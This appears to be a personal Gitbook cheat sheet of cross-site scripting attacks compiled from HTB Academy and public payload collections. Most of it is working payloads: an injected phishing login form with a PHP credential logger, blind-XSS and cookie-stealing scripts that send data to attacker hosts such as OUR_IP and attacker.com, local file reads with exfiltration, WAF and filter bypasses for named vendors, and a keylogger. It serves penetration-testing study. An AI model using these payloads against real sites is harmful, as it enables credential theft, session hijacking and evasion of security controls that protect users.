Copy <script>document.getElementsByTagName('body')[0].innerHTML = '<center><h1 style="color: white">Cyber Security Training</h1><p style="color: white">by <img src="https://academy.hackthebox.com/images/logo-htb.svg" height="25px" alt="HTB Academy"> </p></center>'</script> Phishing
Login form:
Copy <h3>Please login to continue</h3>
<form action=http://OUR_IP>
<input type="username" name="username" placeholder="Username">
<input type="password" name="password" placeholder="Password">
<input type="submit" name="submit" value="Login">
</form> Payload:
Copy document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>'); Vicitm URL: http://SERVER_IP/phishing/index.php?url=...SNIP...
Remove the URL field, such that they may think that they have to log in to be able to use the page. To do so, we can use the JavaScript function document.getElementById().remove() function.
Find the id of the HTML element we want to remove:
Copy document.getElementById('urlform').remove(); Final Payload:
Copy document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove(); Remove the original HTML code left after our injected login form
Credential Stealing
If any victim attempts to log in with the form, we will get their credentials.
Copy connect to [10.10.XX.XX] from (UNKNOWN) [10.10.XX.XX] XXXXX
GET /?username=test&password=test&submit=Login HTTP/1.1
Host: 10.10.XX.XX
...SNIP... Use a basic PHP script that logs the credentials from the HTTP request and then returns the victim to the original page without any injections
index.php:
Copy <?php
if (isset($_GET['username']) && isset($_GET['password'])) {
$file = fopen("creds.txt", "a+");
fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
header("Location: http://SERVER_IP/phishing/index.php");
fclose($file);
exit();
}
?> Start a PHP listening server,
Copy $ mkdir /tmp/tmpserver
$ cd /tmp/tmpserver
$ vi index.php #at this step we wrote our index.php file
$ sudo php -S 0.0.0.0:80
PHP 7.4.15 Development Server (http://0.0.0.0:80) started Blind XSS Detection
Payload Generator:
Copy <script src="http://OUR_IP/script.js"></script> Identify the vulnerable input field that executed the script
Copy <script src="http://OUR_IP/username"></script> If we get a request for /username, then we know that the username field is vulnerable to XSS, and so on.
Copy <img src="http://example.burpcollaborator.net/image">
<img src="http://example.burpcollaborator.net/image-only" onerror='this.src="http://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
<img src=x onerror='this.src="http://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
<img src=x onerror='this.src="http://"+btoa(document.location)+".example.burpcollaborator.net/image-dns?"'>
<img src=x onerror='this.src="http://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
<img src=x onerror='fetch("http://example.burpcollaborator.net/image-xss-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})'>
<iframe src='javascript:window.location="http://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)'></iframe>
<iframe srcdoc='<script>window.location="http://example.burpcollaborator.net/iframe-srcdoc?"+btoa(parent.document.location)</script>'></iframe>
<iframe srcdoc='<script>fetch("http://example.burpcollaborator.net/iframe-srcdoc-post",{method:"POST",body:btoa(parent.document.body.innerHTML),mode:"no-cors"})</script>'></iframe>
<object data='javascript:window.location="http://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)'></object>
<input onfocus='fetch("http://example.burpcollaborator.net/imput-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})' autofocus>
<script src=http://example.burpcollaborator.net/script-tag></script>
<script type="text/javascript" src="http://example.burpcollaborator.net/script-tag-type"></script>
<script type="module" src="http://example.burpcollaborator.net/script-tag-module"></script>
<script nomodule src="http://example.burpcollaborator.net/script-tag-nomodule"></script>
'"><img src="http://example.burpcollaborator.net/image">
'"><img src="http://example.burpcollaborator.net/image-only" onerror='this.src="http://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
'"><img src=x onerror='this.src="http://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
'"><img src=x onerror='this.src="http://"+btoa(document.location)+".example.burpcollaborator.net/image-dns?"'>
'"><img src=x onerror='this.src="http://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
'"><img src=x onerror='fetch("http://example.burpcollaborator.net/image-xss-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})'>
'"><iframe src='javascript:window.location="http://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)'></iframe>
'"><iframe srcdoc='<script>window.location="http://example.burpcollaborator.net/iframe-srcdoc?"+btoa(parent.document.location)</script>'></iframe>
'"><iframe srcdoc='<script>fetch("http://example.burpcollaborator.net/iframe-srcdoc-post",{method:"POST",body:btoa(parent.document.body.innerHTML),mode:"no-cors"})</script>'></iframe>
'"><object data='javascript:window.location="http://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)'></object>
<input onfocus='fetch("http://example.burpcollaborator.net/imput-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})' autofocus>
'"><script src=http://example.burpcollaborator.net/script-tag></script>
'"><script type="text/javascript" src="http://example.burpcollaborator.net/script-tag-type"></script>
'"><script type="module" src="http://example.burpcollaborator.net/script-tag-module"></script>
'"><script nomodule src="http://example.burpcollaborator.net/script-tag-nomodule"></script>
javascript:window.location="http://example.burpcollaborator.net/js-scheme?"+btoa(document.location)
';"</scrpt><scrpt/src=//example.burpcollaborator.net/c/target-1></scrpt>
'//><scrIpt src=//example.burpcollaborator.net/c/kee-kee></scrIpt>
1"`/import(src)'<Script/Src=//example.burpcollaborator.net?1=[ID]><Img/OnLoad='`
--></tiTle></stYle></texTarea></scrIpt>"//'//><scrIpt src="http://example.burpcollaborator.net/"></scrIpt>
Copy # Include your IP into the base64
<!-- Image tag -->
'"><img src="x" onerror="eval(atob(this.id))" id="Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==">
<!-- Input tag with autofocus -->
'"><input autofocus onfocus="eval(atob(this.id))" id="Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==">
<!-- In case jQuery is loaded, we can make use of the getScript method -->
'"><script>$.getScript("{SERVER}/script.js")</script>
<!-- Make use of the JavaScript protocol (applicable in cases where your input lands into the "href" attribute or a specific DOM sink) -->
javascript:eval(atob("Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw=="))
<!-- Render an iframe to validate your injection point and receive a callback -->
'"><iframe src="{SERVER}"></iframe>
<!-- Bypass certain Content Security Policy (CSP) restrictions with a base tag -->
<base href="{SERVER}" />
<!-- Make use of the meta-tag to initiate a redirect -->
<meta http-equiv="refresh" content="0; url={SERVER}" />
<!-- In case your target makes use of AngularJS -->
{{constructor.constructor("import('{SERVER}/script.js')")()}} Payloads from PayloadsAllTheThings
Copy "><script src=//OUR_IP/field_name></script>
Copy <script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://OUR_IP")</script>
'"></title></textarea></script></style></noscript><script src=http://OUR_IP></script>
Copy 0xss0rz@htb[/htb]$ mkdir /tmp/tmpserver
0xss0rz@htb[/htb]$ cd /tmp/tmpserver
0xss0rz@htb[/htb]$ sudo php -S 0.0.0.0:80
PHP 7.4.15 Development Server (http://0.0.0.0:80) started Now we can start testing these payloads one by one by using one of them for all of input fields and appending the name of the field after our IP
Copy <script src=http://OUR_IP/fullname></script> #this goes inside the full-name field
<script src=http://OUR_IP/username></script> #this goes inside the username field
...SNIP...
Tip: We will notice that the email must match an email format, even if we try manipulating the HTTP request parameters, as it seems to be validated on both the front-end and the back-end. Hence, the email field is not vulnerable, and we can skip testing it. Likewise, we may skip the password field, as passwords are usually hashed and not usually shown in cleartext. This helps us in reducing the number of potentially vulnerable input fields we need to test.
Try in common header
• Referrer
• X-Forwarded-For, X-Forwarded-Host, X-Forwarded-Ip, Host (in case of a reverse proxy)
• User-Agent
• Etc.
Session Hijacking
Payloads
Copy document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;
Copy <script>document.location='http://OUR_IP/index.php?c='+document.cookie;</script>
<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script> Write any of these JavaScript payloads to script.js, which will be hosted on our VM
Copy new Image().src='http://OUR_IP/index.php?c='+document.cookie Change the URL in the XSS payload we found earlier to use script.js
Copy <script src=http://OUR_IP/script.js></script> If there were many cookies, we may not know which cookie value belongs to which cookie header. So, we can write a PHP script to split them with a new line and write them to a file
Save the following PHP script as index.php
Copy <?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>
Copy # Cookie stealing example
<img src=x onerror="this.src='http://192.168.0.18:8888/?'+document.cookie; this.removeAttribute('onerror');">
Copy <img src=’https://<attacker-server>/yikes?jwt=’+JSON.stringify(localStorage);’--!>
Copy <img src=x encodeURIComponent(document.cookie) onerror="fetch('https://[BURP-COLLAB-ID]/' + encodeURIComponent(document.cookie))">
Copy %3Cimg%20src%3Dx+encodeURIComponent(document.cookie)%20onerror%3D%22fetch(%27https://[BURP-COLLAB-ID]/%27%2bencodeURIComponent(document.cookie))%22%3E Redirect
Copy https://accounts.reddit.com/?dest=javascript:fetch('//attacker.com?c='+btoa(document.cookie)) Bypass HTTPOnly - Sandwich Technique
Copy <img src=x onerror="fetch('/api/info').then(r=>r.text()).then(t=>fetch('http://10.10.16.3/log?data='+encodeURIComponent(t),{mode:'no-cors'}))">
Copy <script>
fetch("http://domain.htb/index.php?page=existing_page")
.then(response => response.text())
.then(data => {
fetch("http://10.10.14.49/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script> If it doesn't work, try to put a js file on your webserver and fetch it:
xss.js
Copy fetch('/api/info')
.then(response => response.text()) // Get the response body as text
.then(text => {
// Send the base64-encoded response to your server
fetch('http://10.10.14.44/data?' + btoa(text), { mode: 'no-cors' });
}); Payload:
Copy <img src=1 onerror="var s=document.createElement('script'); s.src='http://10.10.14.44/xss.js'; document.body.appendChild(s);"> XSS in an email / username
Copy "><Svg/OnLoad=alert(1)>"@gmail.com XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required).
"><img/src/onerror=import('//domain/')>"@yourdomain.com
Copy test+(<script>alert(0)</script>)@example.com XSS in phone number
Copy +441134960000;phone-context=<script>alert(1)</script> Textarea
Copy </textarea><img src="x" onerror="alert(1)"> XSS in .css file
Copy "/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css" XSS.SWF
Copy # https://github.com/evilcos/xss.swf
<object data="//hacker.site/xss.swf">
<embed code="//hacker.site/xss.swf" allowscriptaccess=always> SVG Tag - Confuse filters
Copy %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
Copy <svg>
<script>
/*
<![CDATA[*]]><![CDATA[/]]>alert(1)-/\*/
</script>
Copy <svg> <script> 1<![CDATA[</script>]]>/-alert(1) </script> </svg>
<svg> <script> /* <![CDATA[*]]><![CDATA[/]]>alert(1)-/\*/ </script>
Copy <svg><use><set attributeName="href" to="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000'><image href='1' onerror='alert(1)' /></svg>#x" />
Copy <svg>
<script>alert<![CDATA[<!---->]]>
(1)</script></svg>
Copy <svg><script>
eval('a<?>l<!>e</>rt(1)')
</script></svg>
Copy <svg>
<script>
<!---->a<!---->l<!---->e<!---->r<!---->t<!---->(<!---->1<!---->)
</script>
<svg> XSS Polyglots
Copy jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source), s.stack=Error().stack, s.src=(/,/+/oastify.com/).slice(2), document.documentElement.appendChild(s))//'>
Copy
</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=(alert)(1337)>
/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//>
<!–>/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/**/;{(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*%0D%0AContent-Type:text/html%0D%0A%0D%0A</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
JavaScript://%250Aalert?.(1)//*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*<!–></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
JavaScript://%250Aalert?.(1)//*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*<!–></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>\ 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
In search bar
http://url.com/search?title=<xss_payload>
Copy "><img/src=x onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(document.domain)')()" ISO-2022-JP
Invisible Javascript
XSS using github pages
Server Side - PDF Generator
Copy <iframe src=file:///etc/passwd></iframe> XSS to read local file
Copy <script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
</script>
Copy <script>
function addNewlines(str) {
var result = '';
while (str.length > 0) {
result += str.substring(0, 100) + '\n';
str = str.substring(100);
}
return result;
}
x = new XMLHttpRequest();
x.onload = function(){
document.write(addNewlines(btoa(this.responseText)))
};
x.open("GET", "file:///etc/passwd");
x.send();
</script>
Copy <script>
var readfile = new XMLHttpRequest(); // Read the local file
var exfil = new XMLHttpRequest(); // Send the file to our server
readfile.open("GET","file:///var/www/html/dev-text.php", true);
readfile.send();
readfile.onload = function() {
if (readfile.readyState === 4) {
var url = 'http://burpcollaborator.com?data='+btoa(this.response);
exfil.open("GET", url, true);
exfil.send();
}
}
readfile.onerror = function(){document.write('<a>Oops!</a>');}
</script>
Copy <img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
Copy <script>document.write('<iframe src=file:///etc/passwd></iframe>');</script> Prototype Pollution
For Red Teaming
XSS Keylogger
XSS With JSFuck
Convert document.location='http://attacker.com?'+document.cookie with JSFuck.
Put the result inside <button autofocus onfocus=(eval)([JSFuck])></button>
WAF Bypass
Copy "><input%0a%0atype="hidden"%0a%0aoncontentvisibilityautostatechange=confirm(/Bypassed/)%0d%0astyle=content-visibility:auto>
"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">
<p oncontentvisibilityautostatechange="alert(/FirefoxOnly/)" style="content-visibility:auto">
Copy # alert(origin):
W=!![];H=(W+"")[3];di="al";me="rt";qq="( origin )";meydi=di+H+me+qq;[]["fill"]["constructor"](meydi)() Bypass Filters
Copy #JavaScript and brackets () filtered
<a href="jav
a
script:
confirm``">click me</a>
Copy # Bypass filters
## filter that removes any script tags.
<img src="test" onerror=alert("Hello") />
## alert is filtered
<img src="test" onerror=confirm("Hello") />
## The word hello is filtered
<img src="test" onerror=alert("HHelloello") />
Copy 1) alert = window["al"+"ert"]
2) bypass () with ``
3) replace space with /
4) encode symbols:
< = %3c
> = %3e
" = %22
[ = %5b
] = %5d
` = %60
Copy 1%27/prompt?.(1)/%27
*prompt(document.domain)*
"><img src=x onerrora=confirm() onerror=confirm(1)>
<img//////src=x oNlY=1 oNerror=alert('xxs')//
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt1>
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`//>
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
"><track/onerror='confirm\%601\%60'>
<Img Src=OnXSS OnError={prompt`1`}>
"><img src=x onerrora=confirm() onerror=confirm(1)>
<svg/ONxss='0'/ONload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
"><div/onclick="(function(){setTimeout(()%20=>%20alert(document.domain),%200);})();">Click%20me!</div>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmb GFyZSBCeXBhc3NlZCA6KQ=="))>
<iframe+/ON+onload=%20alert(/str0d/)>
<inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;
"><body/onload="{x:onerror=alert};x"
<svg/%20src=x%20onmouseover%3D%22alert%26%230000000040%3B1)
<Img Src=OnXSS OnError=confirm(1)> Bypass Akamai, Imperva and CloudFlare
Copy <A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
Copy """ontoggle=[JS]
"' "'"ontoggle=[JS] Use this tricks to bypass alert block by XSS WAF
Copy (function(x){this[x+`ert`](1)})`al`
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)
parent[/al/.source+/ert/.source](1)
parent[/al/.source.concat(/ert/.source)](2)
Copy
CloudFlare
<Img Src=OnXSS OnError=alert(1)>
Imperva
<Img Src=//X55.is OnLoad%0C=import(Src)//
Akamai
<A AutoFocus HRef %252F=""OnFocus=top/**/?.['al'%2B'ert'](1)>
<svg/onload=alert/*1337*/(1)>
<svg/onload=alert//
(2)>
<svg/onload=alert/**/(3)>
<svg/onload=alert/**/(4)>
<svg/onload=alert/**/(5)> Amazon / Cloudflare WAF Bypass :
Copy <details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
Copy 1">K='><Svg OnLoad=(confirm)(1)>
Copy <a/href="javascript:Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">ClickMe mXSS (Mutated XSS)
mXSS (Mutated Cross-Site Scripting ) occurs when a browser unexpectedly processes and transforms seemingly safe HTML tags or attributes, allowing malicious scripts to bypass filters and execute.
While libraries like DomPurify are designed to mitigate such attacks, some versions have been exploited by researchers who have discovered new ways to trick the browser and bypass this defense mechanisms.
However, not every developer is aware of DomPurify, or they may choose not to use it for various reasons, opting instead to create their own filters or validators dor safe HTML. This is where mXSS becomes particularly effective in bypassing custum protection measures
Copy <iframe><style id="</iframe><img src=1 onerror=alert(1337)>">
<noframes><style id="</noframes><img src=1 onerror=alert(1337)>">
<noscript><p id="</noscript><img src=1 onerror=alert(1337)>">
<style><p id="</style><img src=1 onerror=alert(1337)>">
<style><p id="</style><img src="1" onerror="alert(1337)">">">
<svg><style><img src="1" onerror="alert(1337)">
<math><style><img src="1" onerror="alert(1337)">
<math><style></style></math><img src="1" onerror="alert(1337)">
<select><style><input><img src=1 onerror=alert(1337)></select>
<select></select><input><img src="1" onerror="alert(1337)">
<body><title><p id="</title><img src onerror=alert(1337)>"></title>
<body><noscript><p id="</noscript><img src onerror=alert(1337)>">
<maths><style><!--</style><img src onerror=alert(1337)>--></style></maths>
<svg><style>/*<img src onerror=alert(1337)>*/</style></svg>
<math><style>/*<img src onerror=alert(1337)>*/
<noscript><style>/*</noscript><img src onerror=alert(1337)>*/
<math><annotation-xml><style><img src onerror=alert(1337)></style></annotation-xml></math>
<body><textarea><a is="</textarea><img src onerror=alert(1337)>">
<math><annotation-xml encoding="text/html"><x><svg><mtext><textarea><a is="</textarea><img src onerror=alert(1337)>">
<form><math><mtext></form><form><mglyph><svg><mtext><title><path is="</title><img src onerror=alert(1337)>">
Copy <math><foo-test><mi><li><table><foo-test><li></li></foo-test><a>
<style>
<! \${
</style>
}
<foo-b id="><img src onerror='alert(1)'>">hmm...</foo-b>
</a></table></li></mi></foo-test></math> WhatWaf
CloudFlare
Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
Copy <Img Src=OnXSS OnError=confirm(document.cookie)>
Copy ‘>alert(154)</script><script/154=’;;;;;;;
Copy <Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
"><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))>
Copy <svg/onload=window["al"+"ert"](1337)>
<Img Src=OnXSS OnError=confirm(1337)>
<Svg Only=1 OnLoad=confirm(document.domain)>
<svg onload=alert(document.cookie)>
<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<Img Src=//X55.is OnLoad%0C=import(Src)>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
OnXSS=<Img/Src/OnError=alert(1)>
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
'<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/
<Img/Src/OnError=(alert)(1)>
Copy <select><style></select>
<svg onload=alert(1)>
</style>
Copy "><img src=x onerrora=confirm() onerror=confirm(1)>
Copy <dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
Copy <svg onload=alert("1")><""> CloudFront
Copy ">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
';window/*aabb*/['al'%2b'ert'](document./*aabb*/location);//
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'> Akamai
Copy <a%20href=%0dj	avascript:x='trela'.split('').reverse().join('');self[x](origin)>
Copy '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
Copy <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27> Akamai: Stored XSS via cache poisoning https://twitter.com/WllGates/status/1788179999100444802
Copy "><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))"> Akamai:
Copy '"><A HRef=" AutoFocus OnFocus=top/**/?.'ale'%2B'rt'>"
';k='e'%0Atop['al'+k+'rt'](1)//
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)> In Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:
Copy /login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529 Imperva
Copy <Img Src=//X55.is OnLoad%0C=import(Src)>
<sVg OnPointerEnter="location=javas+cript:ale+rt%2+81%2+9;//</div">
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=a
lert(origin)>
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click Sucuri
Copy <a aa aaa aaaa aaaaaa href=javascript:alert(document.cookie)>ClickMe
<a href="javascript:alert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window.location.href='https://evil.com';">ClickMe</a> Amazon WAF
Copy <details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);"> Modsecurity
Copy <svg onload='new Function["Y000!"].find(al\u0065rt)'>
RXSS
Copy <img src=x onerror=alert(document.domain)//
Copy %3Csvg+on+onload%3D%28alert%29%28document.domain%29%3E Alert(1)
Copy 'a'.replace.call`1${/./}${alert}`/
Copy [alert][0].call(this,1) Stored XSS
Copy https://www\.target\.com/redirectEndpoint.do?redirectPage=redacted&itemFromOrder="'`//><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE"))>
"'`//><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE"))> ASP
Copy %u003Csvg onload=alert(1)>
%u3008svg onload=alert(2)>
%uFF1Csvg onload=alert(3)>
Copy parameter=<svg/¶meter=onload=alert()>
Copy /(A(%22onerror='alert%60123%60'test))/ Keylogger
Copy # Keylogger example - Source TryHackMe
<script type="text/javascript">
let l = ""; // Variable to store key-strokes in
document.onkeypress = function (e) { // Event to listen for key presses
l += e.key; // If user types, log it to the l variable
console.log(l); // update this line to post to your own server
}
</script> Resources
Payloads
Interesting Books
Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.
